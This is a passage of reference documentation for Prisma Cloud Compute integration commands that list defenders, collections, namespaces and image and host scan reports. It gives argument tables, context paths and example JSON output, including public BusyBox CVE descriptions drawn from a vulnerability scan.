| PrismaCloudCompute.DefenderDetails.systemInfo | Unknown | The system information of the defender host. |
| PrismaCloudCompute.DefenderDetails.tasClusterID | String | The ID used to identify the TAS cluster of the defender. Typically this is the cloud controller API address. |
| PrismaCloudCompute.DefenderDetails.type | String | The type of the defender (for example, registry scanner or Kubernetes node). |
| PrismaCloudCompute.DefenderDetails.version | String | The agent version. |

Command Example#

!prisma-cloud-compute-defenders-list connected=true limit=1

Context Example#

{
"PrismaCloudCompute": {
"DefenderDetails": {
"category": "container",
"cloudMetadata": {
"resourceID": "123",
"image": "image name",
"provider": "aws",
"type": "c5.xlarge",
"region": "aws region",
"accountID": "1234"
},
"hostname": "host1",
"features": {
"proxyListenerType": "none"
},
"compatibleVersion": true,
"lastModified": "September 02, 2021 11:05:08 AM",
"firewallProtection": {
"supported": false,
"enabled": false
},
"fqdn": "host1.lab.com",
"remoteMgmtSupported": true,
"status": {
"container": {
"scanTime": "2021-12-13T11:05:14.178Z",
"completed": true
},
"features": {
"err": ""
},
"process": {
"enabled": true,
"err": ""
},
"lastModified": "0001-01-01T00:00:00Z",
"appFirewall": {
"enabled": true,
"err": ""
},
"hostNetworkFirewall": {
"enabled": true,
"err": ""
},
"hostCustomCompliance": {
"err": ""
},
"filesystem": {
"enabled": true,
"err": ""
},
"runtime": {
"enabled": true,
"err": ""
},
"image": {
"scanTime": "2021-12-13T14:19:36.09Z",
"completed": true
},
"containerNetworkFirewall": {
"enabled": true,
"err": ""
},
"network": {
"enabled": true,
"err": ""
}
},
"version": "21.04.439",
"collections": [
"All",
"123"
],
"proxy": {
"httpProxy": "",
"ca": "",
"password": {
"encrypted": ""
},
"noProxy": "",
"user": ""
},
"systemInfo": {
"kernelVersion": "4.14.123-111.109.amzn2.x86_64",
"totalDiskSpaceGB": 199,
"cpuCount": 4,
"freeDiskSpaceGB": 180,
"memoryGB": 7.446006774902344
},
"connected": true,
"remoteLoggingSupported": true,
"type": "docker",
"port": 8084,
"certificateExpiration": "2024-09-01T11:00:00Z"
}
}
}

Human Readable Output#

Defenders Information#

| Hostname | Version | Status | Listener |
| --- | --- | --- | --- |
| host1 | 21.04.439 | Connected since September 02, 2021 11:05:08 AM | none |

prisma-cloud-compute-collections-list#


Retrieves a list of all collections.

Base Command#

prisma-cloud-compute-collections-list

Requires Role#

auditor

Input#

| Argument Name | Description | Required |
| --- | --- | --- |
| limit | The maximum number of records of collections to return. Default is 50. | Optional |

Context Output#

| Path | Type | Description |
| --- | --- | --- |
| PrismaCloudCompute.Collection.accountIDs | String | A list of the cloud account IDs. |
| PrismaCloudCompute.Collection.appIDs | String | A list of application IDs. |
| PrismaCloudCompute.Collection.clusters | String | A list of Kubernetes cluster names. |
| PrismaCloudCompute.Collection.codeRepos | String | A list of remote code repositories. |
| PrismaCloudCompute.Collection.color | String | A color code associated with the collection. |
| PrismaCloudCompute.Collection.containers | String | A list of containers that are associated with this collection. |
| PrismaCloudCompute.Collection.description | String | A free-text description of the collection. |
| PrismaCloudCompute.Collection.functions | String | A list of functions that are associated with this collection. |
| PrismaCloudCompute.Collection.hosts | String | A list of hosts that are associated with this collection. |
| PrismaCloudCompute.Collection.images | String | A list of images that are associated with this collection. |
| PrismaCloudCompute.Collection.labels | String | A list of labels that are associated with this collection. |
| PrismaCloudCompute.Collection.modified | Date | The timestamp of when the collection was last modified. |
| PrismaCloudCompute.Collection.name | String | A unique name associated with the collection. |
| PrismaCloudCompute.Collection.namespaces | String | The Kubernetes namespaces. |
| PrismaCloudCompute.Collection.owner | String | The collection owner (the last user who modified the collection). |
| PrismaCloudCompute.Collection.system | Boolean | Whether this collection was created by the system or by the user. |

Command Example#

!prisma-cloud-compute-collections-list limit=1

Context Example#

{
"PrismaCloudCompute": {
"Collection": {
"functions": [
"*"
],
"appIDs": [
"*"
],
"description": "System - all resources collection",
"color": "#602DFB",
"prisma": false,
"labels": [
"*"
],
"modified": "September 02, 2021 11:05:06 AM",
"system": true,
"owner": "system",
"hosts": [
"*"
],
"namespaces": [
"*"
],
"codeRepos": [
"*"
],
"images": [
"*"
],
"clusters": [
"*"
],
"accountIDs": [
"*"
],
"containers": [
"*"
],
"name": "All"
}
}
}

Human Readable Output#

Collections Information#

| Name | Description | Owner | Modified |
| --- | --- | --- | --- |
| All | System - all resources collection | system | September 02, 2021 11:05:06 AM |

prisma-cloud-compute-container-namespace-list#


Get the names of the container namespaces.

Base Command#

prisma-cloud-compute-container-namespace-list

Requires Role#

devSecOps

Input#

| Argument Name | Description | Required |
| --- | --- | --- |
| cluster | Comma-separated list of cluster names to filter the results by. | Optional |
| collections | Comma-separated list of collections to filter the results by. Can be retrieved from !prisma-cloud-compute-collections-list. | Optional |
| limit | The maximum number of namespace name records to return. Default is 50. | Optional |

Context Output#

| Path | Type | Description |
| --- | --- | --- |
| PrismaCloudCompute.RadarContainerNamespace | String | The names of the container namespaces. |

Command Example#

!prisma-cloud-compute-container-namespace-list limit=3

Context Example#

{
"PrismaCloudCompute": {
"RadarContainerNamespace": [
"namespace1",
"namespace2",
"namespace3"
]
}
}

Human Readable Output#

Collections Information#

| Name |
| --- |
| namespace1 |
| namespace2 |
| namespace3 |

prisma-cloud-compute-images-scan-list#


Get image scan reports. A report includes vulnerabilities, compliance issues, binaries, and related image metadata.

Base Command#

prisma-cloud-compute-images-scan-list

Requires Role#

vulnerabilityManager

Input#

| Argument Name | Description | Required |
| --- | --- | --- |
| clusters | A comma-separated list of cluster names to filter the results by. | Optional |
| compact | Whether only minimal image data is to be returned (i.e., skip vulnerabilities, compliance, and extended image metadata). Possible values are: true, false. Default is true. | Optional |
| fields | A comma-separated list of fields to return. Possible values are labels, repo, registry, clusters, hosts, tag. | Optional |
| hostname | A comma-separated list of hostnames to filter the results by. Can be retrieved from !prisma-cloud-compute-profile-host-list. | Optional |
| id | A comma-separated list of image IDs to filter the results by. Run !prisma-cloud-compute-images-scan-list without any arguments to get image IDs. | Optional |
| name | A comma-separated list of image names to filter the results by. | Optional |
| registry | A comma-separated list of image registries to filter the results by. | Optional |
| repository | A comma-separated list of image repositories to filter the results by. | Optional |
| compliance_ids | A comma-separated list of compliance IDs to filter the results by. | Optional |
| limit_record | The maximum number of scan image records to return. Default is 10. | Optional |
| limit_stats | The maximum number of compliance/vulnerability records to return. Default is 10. | Optional |
| offset | The offset by which to begin listing image scan results. Default is 0. | Optional |
| all_results | Whether to retrieve all results. The "limit_record" and "limit_stats" arguments will be ignored. More than 1,500 results will slow down the process. Possible values are: true, false. Default is false. | Optional |

Context Output#

| Path | Type | Description |
| --- | --- | --- |
| PrismaCloudCompute.ReportsImagesScan._id | String | Image identifier (image ID or repo:tag). |
| PrismaCloudCompute.ReportsImagesScan.allCompliance | Unknown | Data regarding passed compliance checks. |
| PrismaCloudCompute.ReportsImagesScan.appEmbedded | Boolean | Whether this image was scanned by an app-embedded defender. |
| PrismaCloudCompute.ReportsImagesScan.applications | Unknown | Products in the image. |
| PrismaCloudCompute.ReportsImagesScan.baseImage | String | The base name of the image. Used when filtering the vulnerabilities by base images. |
| PrismaCloudCompute.ReportsImagesScan.binaries | Unknown | Binaries in the image. |
| PrismaCloudCompute.ReportsImagesScan.cloudMetadata | Unknown | The metadata for an instance running in a cloud provider (AWS/GCP/Azure). |
| PrismaCloudCompute.ReportsImagesScan.clusters | String | Cluster names. |
| PrismaCloudCompute.ReportsImagesScan.collections | String | Collections to which this result applies. |
| PrismaCloudCompute.ReportsImagesScan.complianceDistribution | Unknown | The number of vulnerabilities per type. |
| PrismaCloudCompute.ReportsImagesScan.complianceIssues | Unknown | Number of compliance issues. |
| PrismaCloudCompute.ReportsImagesScan.complianceRiskScore | Number | Compliance risk score for the image. |
| PrismaCloudCompute.ReportsImagesScan.creationTime | Date | Date/time when the image was created. |
| PrismaCloudCompute.ReportsImagesScan.distro | String | Full name of the distribution. |
| PrismaCloudCompute.ReportsImagesScan.ecsClusterName | String | Elastic Container Service (ECS) cluster name. |
| PrismaCloudCompute.ReportsImagesScan.err | String | Description of an error that occurred during the image health scan. |
| PrismaCloudCompute.ReportsImagesScan.externalLabels | Unknown | Kubernetes external labels of all containers running this image. |
| PrismaCloudCompute.ReportsImagesScan.files | Unknown | Files in the container. |
| PrismaCloudCompute.ReportsImagesScan.firewallProtection | Unknown | The status of the Web-Application and API Security (WAAS) protection. |
| PrismaCloudCompute.ReportsImagesScan.firstScanTime | Date | Date/time when this image was first scanned (preserved during version updates). |
| PrismaCloudCompute.ReportsImagesScan.history | Unknown | Docker image history. |
| PrismaCloudCompute.ReportsImagesScan.hostDevices | String | Map from host network device name to IP address. |
| PrismaCloudCompute.ReportsImagesScan.hostname | String | Name of the host that was scanned. |
| PrismaCloudCompute.ReportsImagesScan.hosts | Unknown | A fast index for image scan results metadata per host. |
| PrismaCloudCompute.ReportsImagesScan.id | String | Image ID. |
| PrismaCloudCompute.ReportsImagesScan.image | Unknown | A container image. |
| PrismaCloudCompute.ReportsImagesScan.installedProducts | Unknown | Data regarding products running in the environment. |
| PrismaCloudCompute.ReportsImagesScan.instances | Unknown | Details about each occurrence of the image (tag + host). |
| PrismaCloudCompute.ReportsImagesScan.k8sClusterAddr | String | Endpoint of the Kubernetes API server. |
| PrismaCloudCompute.ReportsImagesScan.labels | String | Image labels. |
| PrismaCloudCompute.ReportsImagesScan.layers | String | Image's filesystem layers. Each layer is a SHA256 digest of the filesystem diff. |
| PrismaCloudCompute.ReportsImagesScan.missingDistroVulnCoverage | Boolean | Whether the image operating system is covered in the Intelligence Stream (IS) (true) or not (false). |
| PrismaCloudCompute.ReportsImagesScan.namespaces | String | Kubernetes namespaces of all the containers running this image. |
| PrismaCloudCompute.ReportsImagesScan.osDistro | String | Name of the operating system distribution. |
| PrismaCloudCompute.ReportsImagesScan.osDistroRelease | String | Operating system distribution release. |
| PrismaCloudCompute.ReportsImagesScan.osDistroVersion | String | Operating system distribution version. |
| PrismaCloudCompute.ReportsImagesScan.packageManager | Boolean | Whether the package manager is installed for the operating system. |
| PrismaCloudCompute.ReportsImagesScan.packages | Unknown | Packages that exist in the image. |
| PrismaCloudCompute.ReportsImagesScan.registryNamespace | String | IBM cloud namespace to which the image belongs. |
| PrismaCloudCompute.ReportsImagesScan.repoDigests | String | Digests of the image. Used for content trust (notary). Has one digest per tag. |
| PrismaCloudCompute.ReportsImagesScan.repoTag | Unknown | An image repository and its associated tag or registry digest. |
| PrismaCloudCompute.ReportsImagesScan.rhelRepos | String | The RPM repository IDs from which the packages in this image were installed. Used for matching vulnerabilities by Red Hat CPEs. |
| PrismaCloudCompute.ReportsImagesScan.riskFactors | Unknown | The mapping of the existence of vulnerability risk factors. |
| PrismaCloudCompute.ReportsImagesScan.scanID | String | Scan ID. |
| PrismaCloudCompute.ReportsImagesScan.scanTime | Date | Date/time of the last scan of the image. |
| PrismaCloudCompute.ReportsImagesScan.scanVersion | String | Defender version that published the image. |
| PrismaCloudCompute.ReportsImagesScan.startupBinaries | Unknown | Binaries that are expected to run when the container is created from this image. |
| PrismaCloudCompute.ReportsImagesScan.tags | Unknown | Tags associated with the given image. |
| PrismaCloudCompute.ReportsImagesScan.topLayer | String | SHA256 of the image's last layer, that is, the last element of the layers field. |
| PrismaCloudCompute.ReportsImagesScan.trustResult | Unknown | An aggregated image trust result. |
| PrismaCloudCompute.ReportsImagesScan.trustStatus | String | The trust status for an image. |
| PrismaCloudCompute.ReportsImagesScan.twistlockImage | Boolean | Whether the image is a Twistlock image (true) or not (false). |
| PrismaCloudCompute.ReportsImagesScan.type | Unknown | The scanning type performed. |
| PrismaCloudCompute.ReportsImagesScan.vulnerabilities | Unknown | CVE vulnerabilities of the image. |
| PrismaCloudCompute.ReportsImagesScan.vulnerabilitiesCount | Number | Total number of vulnerabilities. |
| PrismaCloudCompute.ReportsImagesScan.vulnerabilityDistribution | Unknown | The number of vulnerabilities per type. |
| PrismaCloudCompute.ReportsImagesScan.vulnerabilityRiskScore | Number | Image's CVE risk score. |
| PrismaCloudCompute.ReportsImagesScan.wildFireUsage | Unknown | The WildFire usage stats. The period for the usage varies with the context. |
| PrismaCloudCompute.ReportsImagesScan.complianceIssuesCount | Number | Number of compliance issues. |

Command Example#

!prisma-cloud-compute-images-scan-list id=image123 limit_stats=2 compact=false

Context Example#

{
"PrismaCloudCompute": {
"ReportsImagesScan": {
"cloudMetadata": {
"resourceID": "i-123",
"image": "ami-123",
"provider": "aws",
"type": "t2.large",
"region": "eu-west-123",
"accountID": "123"
},
"hostname": "",
"vulnerabilityDistribution": {
"high": 28,
"total": 60,
"medium": 20,
"critical": 12,
"low": 0
},
"image": {
"created": "2018-05-10T10:32:49.309Z"
},
"instances": [
{
"image": "demisto/python:1.3-alpine",
"modified": "2021-12-14T14:19:36.091Z",
"repo": "demisto/python",
"host": "host123",
"tag": "1.3-alpine",
"registry": ""
}
],
"complianceIssues": [
{
"templates": [
"PCI",
"DISA STIG"
],
"vecStr": "",
"text": "",
"discovered": "0001-01-01T00:00:00Z",
"exploit": "",
"layerTime": 0,
"id": 41,
"severity": "high",
"title": "(CIS_Docker_v1.2.0 - 4.1) Image should be created with a non-root user",
"packageVersion": "",
"cause": "",
"cvss": 0,
"status": "",
"twistlock": false,
"fixDate": "",
"description": "It is a good practice to run the container as a non-root user, if possible. Though user\nnamespace mapping is now available, if a user is already defined in the container image, the\ncontainer is run as that user by default and specific user namespace remapping is not\nrequired",
"link": "",
"cri": false,
"riskFactors": null,
"type": "image",
"packageName": "",
"functionLayer": "",
"published": 0,
"cve": ""
}
],
"repoTag": {
"repo": "demisto/python",
"tag": "1.3-alpine",
"registry": ""
},
"packageManager": true,
"repoDigests": [
"demisto/python@sha256:0bfa24a116efb99c51076ee3801ee8de80e5998a0f85522599c7036dea8a67f1"
],
"id": "image123",
"layers": [
"sha256:04a094fe844e055828cb2d64ead6bd3eb4257e7c7b5d1e2af0da89fa20472cf4",
"sha256:b901e62fe587b147e801712b7833942a540492af8f67cc683ac5a3b7bcbf7eda",
"sha256:240070abd5cc482cbe83e70710e9c161105bf1b69fc4551ceedac541aec1e552",
"sha256:08ed7077578e63f32e98ec38644705d67aec68661663cfa43e7e771f37ac781b",
"sha256:25f89c88aa30915565de42481044fdc3edcde2edcd88c32098b16adbe09c65ec",
"sha256:607e311316ef7ea1437fe4b8f7a6f04f9a61b0f21e2d4ee0611c05bd1d245ff7",
"sha256:21511d4e2cf5964090236c3db6aa38c23f8937aab18226dd1898ef4346fa9a3c",
"sha256:9ec31cab0619e95e88291cd611370e4d0f61d540862496b89eed00845d48a3a8",
"sha256:ce388cb57837216290c2ec5c33ee70ff50ee70a479fdc401f9170f278e68c15d",
"sha256:887b26e25244256638869a154e4b7427f124a1ef64723ea7082096025e7f1520",
"sha256:40c6aaccab9bea3953dfa459e3426d0f8a23fda23ec5495404ae21afa94af475",
"sha256:082ca23ed20f62157e6b3958ed4899fccd6de2501468f668874d746f0af1bc69",
"sha256:e252153001780e97deed131418ef8ed0ad8176f55e14916a338120cc8a464af8",
"sha256:11f9d19047c7dfc84742694c7c7db04ceb346bf60e44a8a28947937aa3408ba2",
"sha256:1945710968a74b7692f635829f9dac189df097b8f7d135aa51f6726dccb2a2be",
"sha256:9dfc2f79a6a83bd3791f4b6c621850b49db37ff729cdc17fd0a7b0ec373338c6"
],
"packages": [
{
"pkgsType": "package",
"pkgs": [
{
"name": "busybox",
"version": "1.27.2-r8",
"cveCount": 450,
"license": "GPL2",
"layerTime": 1525948365
},
{
"name": "apk-tools",
"version": "2.9.1-r2",
"cveCount": 25,
"license": "GPL2",
"layerTime": 1512154128
}
]
},
{
"pkgsType": "python",
"pkgs": [
{
"name": "python",
"version": "2.7.14",
"cveCount": 65,
"license": "PSF license",
"layerTime": 1513722622
},
{
"name": "certifi",
"version": "2017.11.5",
"cveCount": 0,
"license": "MPL-2.0",
"layerTime": 1515337812
}
]
}
],
"complianceDistribution": {
"high": 1,
"total": 1,
"medium": 0,
"critical": 0,
"low": 0
},
"firewallProtection": {
"supported": false,
"enabled": false
},
"allCompliance": {},
"appEmbedded": false,
"installedProducts": {
"docker": "17.06.0-ce",
"osDistro": "Alpine Linux v3.7",
"hasPackageManager": true
},
"collections": [
"All",
"123",
"Test Collection"
],
"startupBinaries": [
{
"path": "/usr/local/bin/python2.7",
"cveCount": 0,
"name": "python",
"md5": "dc8c57a9674d54da18637ffea29eeaba"
}
],
"scanVersion": "21.04.439",
"type": "image",
"distro": "Alpine Linux v3.7",
"files": [],
"scanID": 0,
"osDistro": "alpine",
"tags": [
{
"repo": "demisto/python",
"tag": "1.3-alpine",
"registry": ""
}
],
"Secrets": [],
"applications": [
{
"knownVulnerabilities": 26,
"path": "/bin/busybox",
"version": "1.27.2",
"layerTime": 1525948355,
"name": "busybox"
}
],
"osDistroRelease": "3.7.0",
"topLayer": "sha256:9dfc2f79a6a83bd3791f4b6c621850b49db37ff729cdc17fd0a7b0ec373338c6",
"osDistroVersion": "3.7.0",
"trustStatus": "trusted",
"firstScanTime": "2021-09-02T11:05:27.439Z",
"_id": "image123",
"riskFactors": {
"Remote execution": {},
"High severity": {},
"Has fix": {},
"Attack complexity: low": {},
"Recent vulnerability": {},
"Attack vector: network": {},
"Critical severity": {},
"Medium severity": {},
"DoS": {}
},
"err": "",
"vulnerabilitiesCount": 60,
"scanTime": "2021-12-14T14:19:36.091Z",
"complianceIssuesCount": 1,
"creationTime": "2018-05-10T10:32:49.309Z",
"vulnerabilities": [
{
"templates": null,
"vecStr": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
"text": "",
"discovered": "2021-09-02T11:05:27Z",
"exploit": "",
"layerTime": 1525948365,
"id": 46,
"applicableRules": [
"<1.30.0"
],
"severity": "high",
"title": "",
"packageVersion": "1.27.2-r8",
"cause": "",
"cvss": 7.5,
"status": "fixed in 1.30.1-r5",
"twistlock": false,
"fixDate": "January 09, 2019 16:29:00 PM",
"description": "An issue was discovered in BusyBox before 1.30.0. An out of bounds read in udhcp components (consumed by the DHCP server, client, and relay) allows a remote attacker to leak sensitive information from the stack by sending a crafted DHCP message. This is related to verification in udhcp_get_option() in networking/udhcp/common.c that 4-byte options are indeed 4 bytes.",
"link": "https://nvd.nist.gov/vuln/detail/CVE-2018-20679",
"cri": false,
"riskFactors": {
"Attack complexity: low": {},
"High severity": {},
"Attack vector: network": {},
"Has fix": {}
},
"type": "image",
"packageName": "busybox",
"functionLayer": "",
"published": 1547051340,
"cve": "CVE-2018-20679"
},
{
"templates": null,
"vecStr": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
"text": "",
"discovered": "2021-09-02T11:05:27Z",
"exploit": "",
"layerTime": 1525948365,
"id": 46,
"applicableRules": [
"<1.29.0"
],
"severity": "critical",
"title": "",
"packageVersion": "1.27.2-r8",
"cause": "",
"cvss": 9.8,
"status": "fixed in 1.29.3-r10",
"twistlock": false,
"fixDate": "June 26, 2018 16:29:00 PM",
"description": "BusyBox project BusyBox wget version prior to commit 8e2174e9bd836e53c8b9c6e00d1bc6e2a718686e contains a Buffer Overflow vulnerability in Busybox wget that can result in heap buffer overflow. This attack appear to be exploitable via network connectivity. This vulnerability appears to have been fixed in after commit 8e2174e9bd836e53c8b9c6e00d1bc6e2a718686e.",
"link": "https://nvd.nist.gov/vuln/detail/CVE-2018-1000517",
"cri": false,
"riskFactors": {
"Attack complexity: low": {},
"Attack vector: network": {},
"Has fix": {},
"Critical severity": {}
},
"type": "image",
"packageName": "busybox",
"functionLayer": "",
"published": 1530030540,
"cve": "CVE-2018-1000517"
}
],
"hosts": {
"host123": {
"modified": "2021-12-14T14:19:36.091Z"
}
},
"complianceRiskScore": 10000,
"wildFireUsage": null,
"binaries": [
{
"path": "/bin/busybox",
"version": "1.27.2",
"cveCount": 0,
"name": "busybox",
"md5": "17890907c72a9aa14c5580faf4f6a30a"
},
{
"path": "/sbin/apk",
"cveCount": 0,
"name": "apk",
"md5": "8f77c14fa2ab4f668f6af4bfa3e12587"
}
],
"vulnerabilityRiskScore": 12282000,
"history": [
{
"sizeBytes": 4143684,
"instruction": "ADD file:2b00f26f6004576e2f8faeb3fb0517a14f79ea89a059fe096b54cbecf5da512e in / ",
"emptyLayer": false,
"id": "<missing>",
"created": 1512154128
},
{
"instruction": "CMD [\"/bin/sh\"]",
"emptyLayer": true,
"id": "<missing>",
"created": 1512154128
}
]
}
}
}

Human Readable Output#

Image description#

| ID | Image | OS Distribution | Vulnerabilities Count | Compliance Issues Count |
| --- | --- | --- | --- | --- |
| image123 | demisto/python:1.3-alpine | Alpine Linux v3.7 | 60 | 1 |

Vulnerabilities#

| Cve | Description | Severity | Package Name | Status | Fix Date |
| --- | --- | --- | --- | --- | --- |
| CVE-2018-20679 | An issue was discovered in BusyBox before 1.30.0. An out of bounds read in udhcp components (consumed by the DHCP server, client, and relay) allows a remote attacker to leak sensitive information from the stack by sending a crafted DHCP message. This is related to verification in udhcp_get_option() in networking/udhcp/common.c that 4-byte options are indeed 4 bytes. | high | busybox | fixed in 1.30.1-r5 | January 09, 2019 16:29:00 PM |
| CVE-2018-1000517 | BusyBox project BusyBox wget version prior to commit 8e2174e9bd836e53c8b9c6e00d1bc6e2a718686e contains a Buffer Overflow vulnerability in Busybox wget that can result in heap buffer overflow. This attack appear to be exploitable via network connectivity. This vulnerability appears to have been fixed in after commit 8e2174e9bd836e53c8b9c6e00d1bc6e2a718686e. | critical | busybox | fixed in 1.29.3-r10 | June 26, 2018 16:29:00 PM |

Compliances#

| Id | Severity | Description |
| --- | --- | --- |
| 41 | high | It is a good practice to run the container as a non-root user, if possible. Though user namespace mapping is now available, if a user is already defined in the container image, the container is run as that user by default and specific user namespace remapping is not required |

Command Example#

!prisma-cloud-compute-images-scan-list id=image123 limit_stats=2 compact=true

Context Example#

{
"PrismaCloudCompute": {
"ReportsImagesScan": {
"cloudMetadata": {
"resourceID": "i-123",
"image": "ami-123",
"provider": "aws",
"type": "t2.large",
"region": "eu-west-123",
"accountID": "123"
},
"hostname": "",
"vulnerabilityDistribution": {
"high": 28,
"total": 60,
"medium": 20,
"critical": 12,
"low": 0
},
"image": {
"created": "2018-05-10T10:32:49.309Z"
},
"instances": [
{
"image": "demisto/python:1.3-alpine",
"modified": "2021-12-14T14:19:36.091Z",
"repo": "demisto/python",
"host": "host123",
"tag": "1.3-alpine",
"registry": ""
}
],
"complianceIssues": null,
"repoTag": {
"repo": "demisto/python",
"tag": "1.3-alpine",
"registry": ""
},
"packageManager": false,
"repoDigests": [
"123"
],
"id": "image123",
"packages": null,
"complianceDistribution": {
"high": 1,
"total": 1,
"medium": 0,
"critical": 0,
"low": 0
},
"firewallProtection": {
"supported": false,
"enabled": false
},
"allCompliance": {},
"appEmbedded": false,
"installedProducts": {
"docker": "17.06.0-ce",
"osDistro": "Alpine Linux v3.7",
"hasPackageManager": true
},
"collections": [
"All",
"123",
"Test Collection"
],
"startupBinaries": null,
"scanVersion": "21.04.439",
"type": "image",
"distro": "Alpine Linux v3.7",
"files": null,
"scanID": 0,
"osDistro": "alpine",
"tags": [
{
"repo": "demisto/python",
"tag": "1.3-alpine",
"registry": ""
}
],
"Secrets": null,
"osDistroRelease": "3.7.0",
"topLayer": "sha256:9dfc2f79a6a83bd3791f4b6c621850b49db37ff729cdc17fd0a7b0ec373338c6",
"osDistroVersion": "",
"trustStatus": "trusted",
"firstScanTime": "2021-09-02T11:05:27.439Z",
"_id": "image123",
"riskFactors": {
"Remote execution": {},
"High severity": {},
"Has fix": {},
"Attack complexity: low": {},
"Recent vulnerability": {},
"Attack vector: network": {},
"Critical severity": {},
"Medium severity": {},
"DoS": {}
},
"err": "",
"vulnerabilitiesCount": 60,
"scanTime": "2021-12-14T14:19:36.091Z",
"complianceIssuesCount": 1,
"creationTime": "2018-05-10T10:32:49.309Z",
"vulnerabilities": null,
"hosts": {
"host123": {
"modified": "2021-12-14T14:19:36.091Z"
}
},
"complianceRiskScore": 10000,
"wildFireUsage": null,
"binaries": null,
"vulnerabilityRiskScore": 12282000,
"history": null
}
}
}

Human Readable Output#

Image description#

| ID | Image | OS Distribution | Vulnerabilities Count | Compliance Issues Count |
| --- | --- | --- | --- | --- |
| image123 | demisto/python:1.3-alpine | Alpine Linux v3.7 | 60 | 1 |

Vulnerability Statistics#

| Critical | High | Medium | Low |
| --- | --- | --- | --- |
| 12 | 28 | 20 | 0 |

Compliance Statistics#

| Critical | High | Medium | Low |
| --- | --- | --- | --- |
| 0 | 1 | 0 | 0 |

prisma-cloud-compute-hosts-scan-list#


Get the host scan reports. Each report includes the host's vulnerabilities, compliance issues, binaries, packages, and related metadata.

Base Command#

prisma-cloud-compute-hosts-scan-list

Requires Role#

vulnerabilityManager

Input#

| Argument Name | Description | Required |
| --- | --- | --- |
| clusters | A comma-separated list of cluster names to filter the results by. | Optional |
| compact | Whether to return only minimal host data (skipping vulnerabilities, compliance issues, and extended metadata). Possible values are: true, false. Default is true. | Optional |
| distro | A comma-separated list of operating system distros to filter the results by. | Optional |
| fields | A comma-separated list of fields to return. Possible values are labels, repo, registry, clusters, hosts, tag. | Optional |
| hostname | A comma-separated list of hostnames to filter the results by. Can be retrieved from !prisma-cloud-compute-profile-host-list. | Optional |
| provider | A comma-separated list of cloud providers to filter the results by. | Optional |
| compliance_ids | A comma-separated list of compliance IDs to filter the results by. | Optional |
| limit_record | The maximum number of host scan records to return. Default is 10. | Optional |
| limit_stats | The maximum number of compliance/vulnerability records to return per host. Default is 10. | Optional |
| offset | The offset by which to begin listing host scan results. Default is 0. | Optional |
| all_results | Whether to retrieve all results. When true, the "limit_record" and "limit_stats" arguments are ignored. Retrieving more than 1,500 results will slow down the process. Possible values are: true, false. Default is false. | Optional |

Context Output#

| Path | Type | Description |
| --- | --- | --- |
| PrismaCloudCompute.ReportHostScan._id | String | The host identifier (host ID or hostname). |
| PrismaCloudCompute.ReportHostScan.allCompliance | Unknown | The data regarding passed compliance checks. |
| PrismaCloudCompute.ReportHostScan.appEmbedded | Boolean | Whether this image was scanned by an app-embedded defender. |
| PrismaCloudCompute.ReportHostScan.applications | Unknown | Products in the image. |
| PrismaCloudCompute.ReportHostScan.binaries | Unknown | Binaries in the image. |
| PrismaCloudCompute.ReportHostScan.cloudMetadata | Unknown | The metadata for an instance running in a cloud provider (AWS/GCP/Azure). |
| PrismaCloudCompute.ReportHostScan.clusters | String | Cluster names. |
| PrismaCloudCompute.ReportHostScan.collections | String | Collections to which this result applies. |
| PrismaCloudCompute.ReportHostScan.complianceDistribution | Unknown | The number of compliance issues per severity. |
| PrismaCloudCompute.ReportHostScan.complianceIssues | Unknown | The compliance issues found on the host. |
| PrismaCloudCompute.ReportHostScan.complianceRiskScore | Number | Compliance risk score for the host. |
| PrismaCloudCompute.ReportHostScan.creationTime | Date | Date/time when the image was created. |
| PrismaCloudCompute.ReportHostScan.distro | String | Full name of the distribution. |
| PrismaCloudCompute.ReportHostScan.ecsClusterName | String | Elastic Container Service (ECS) cluster name. |
| PrismaCloudCompute.ReportHostScan.err | String | Description of an error that occurred during the health scan. |
| PrismaCloudCompute.ReportHostScan.externalLabels | Unknown | Kubernetes external labels of all containers running this image. |
| PrismaCloudCompute.ReportHostScan.firewallProtection | Unknown | The status of the Web-Application and API Security (WAAS) protection. |
| PrismaCloudCompute.ReportHostScan.firstScanTime | Date | Date/time when this host was first scanned (preserved during version updates). |
| PrismaCloudCompute.ReportHostScan.history | Unknown | Docker image history. |
| PrismaCloudCompute.ReportHostScan.hostDevices | String | Map from host network device name to IP address. |
| PrismaCloudCompute.ReportHostScan.hostname | String | Name of the host that was scanned. |
| PrismaCloudCompute.ReportHostScan.hosts | Unknown | A fast index for image scan results metadata per host. |
| PrismaCloudCompute.ReportHostScan.image | Unknown | A container image. |
| PrismaCloudCompute.ReportHostScan.installedProducts | Unknown | Data regarding products running in the environment. |
| PrismaCloudCompute.ReportHostScan.instances | Unknown | Details about each occurrence of the image (tag + host). |
| PrismaCloudCompute.ReportHostScan.k8sClusterAddr | String | Endpoint of the Kubernetes API server. |
| PrismaCloudCompute.ReportHostScan.namespaces | String | Kubernetes namespaces of all the containers running this image. |
| PrismaCloudCompute.ReportHostScan.osDistro | String | Name of the operating system distribution. |
| PrismaCloudCompute.ReportHostScan.osDistroRelease | String | Operating system distribution release. |
| PrismaCloudCompute.ReportHostScan.osDistroVersion | String | Operating system distribution version. |
| PrismaCloudCompute.ReportHostScan.packageManager | Boolean | Whether the package manager is installed for the operating system. |
| PrismaCloudCompute.ReportHostScan.packages | Unknown | The packages that exist on the host. |
| PrismaCloudCompute.ReportHostScan.repoDigests | String | Digests of the image. Used for content trust (notary). Has one digest per tag. |
| PrismaCloudCompute.ReportHostScan.repoTag | Unknown | An image repository and its associated tag or registry digest. |
| PrismaCloudCompute.ReportHostScan.riskFactors | Unknown | Map of the vulnerability risk factors present in the scan results. |
| PrismaCloudCompute.ReportHostScan.scanID | String | Scan ID. |
| PrismaCloudCompute.ReportHostScan.scanTime | Date | Date/time of the last scan of the host. |
| PrismaCloudCompute.ReportHostScan.scanVersion | String | Defender version that published the scan. |
| PrismaCloudCompute.ReportHostScan.startupBinaries | Unknown | Binaries that are expected to run when the container is created from this image. |
| PrismaCloudCompute.ReportHostScan.tags | Unknown | Tags associated with the given image. |
| PrismaCloudCompute.ReportHostScan.topLayer | String | SHA256 of the image's last layer, which is the last element of the Layers field. |
| PrismaCloudCompute.ReportHostScan.trustStatus | String | The trust status for an image. |
| PrismaCloudCompute.ReportHostScan.type | Unknown | The scanning type performed (for example, host). |
| PrismaCloudCompute.ReportHostScan.vulnerabilities | Unknown | CVE vulnerabilities of the host. |
